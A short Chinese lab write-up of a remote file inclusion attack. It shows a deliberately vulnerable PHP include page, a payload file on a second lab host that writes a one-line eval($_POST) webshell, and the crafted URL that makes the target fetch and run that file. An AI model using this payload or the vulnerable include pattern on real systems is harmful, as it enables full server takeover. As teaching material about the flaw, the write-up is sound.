您的位置:首页 > 其它

[基本实验] 远程文件包含

2015-07-26 15:50 246 查看
首先在自己的网站(10.0.3.88)中创建一个txt文件(test.txt),内容为:

<?php
$payload = "<?php eval(\$_POST['123']);?>";
$myfile = fopen("cforce.php", "w") or die("Unable to open file!");
fwrite($myfile,$payload);
fclose($myfile);
?>


随后访问存在漏洞的网站(10.0.3.82)并且构造特殊的URL:
http://10.0.3.82/rfi.php?file=http://10.0.3.88/test.txt
rfi.php是存在漏洞的网页
<?php
if (isset($_GET["file"]))
{
@include($_GET["file"]);
#readfile($_GET["file"]);
}
?>
在漏洞网站的根目录下,生成了一个新的文件cforce.php

cforce.php

<?php eval($_POST['123']);?>


这是一个一句话木马,可以通过中国菜刀去连接,获得webshell。

实验完毕,通过远程文件包含获得一个webshell

在这个漏洞环境下,只要文件内容符合PHP语法规范,那么任何扩展名都可以被PHP解析。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: